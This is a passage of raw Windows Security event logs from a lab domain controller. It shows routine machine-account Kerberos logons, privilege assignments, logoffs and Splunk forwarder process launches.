Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7EE79B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62521
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:04:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264323
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7EE79B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:04:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264322
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7EE729
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 62520
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:04:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264321
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7EE729
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:04:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264320
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7EE6E1
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:04:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264319
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7EE6E1
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:04:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264318
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7EE5F3
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62519
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:04:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264317
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7EE5F3
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264329
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x4c8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264328
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1988
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:04:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264330
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x154c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
04/19/2021 03:04:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264331
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1ae8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
04/19/2021 03:04:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264332
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17e0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
04/19/2021 03:04:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264334
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1130
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
04/19/2021 03:04:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264333
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14d0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
04/19/2021 03:04:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264335
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7EE79B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:04:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264338
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7F1FFF
Logon Type: 3
04/19/2021 03:04:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264337
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7F1FFF
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62532
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:04:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264336
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7F1FFF
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:05:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264340
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1780
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
04/19/2021 03:05:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264339
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16c0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
04/19/2021 03:05:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264341
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a74
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
04/19/2021 03:05:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264342
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
04/19/2021 03:05:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264343
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18d4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
04/19/2021 03:05:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264345
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
04/19/2021 03:05:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264344
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1aec
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
04/19/2021 03:05:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264348
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7F5991
Logon Type: 3
04/19/2021 03:05:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264347
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7F5991
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62545
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 03:05:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264346
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7F5991
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:06:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264350
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a30
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
04/19/2021 03:06:08 PM
LogName=Security
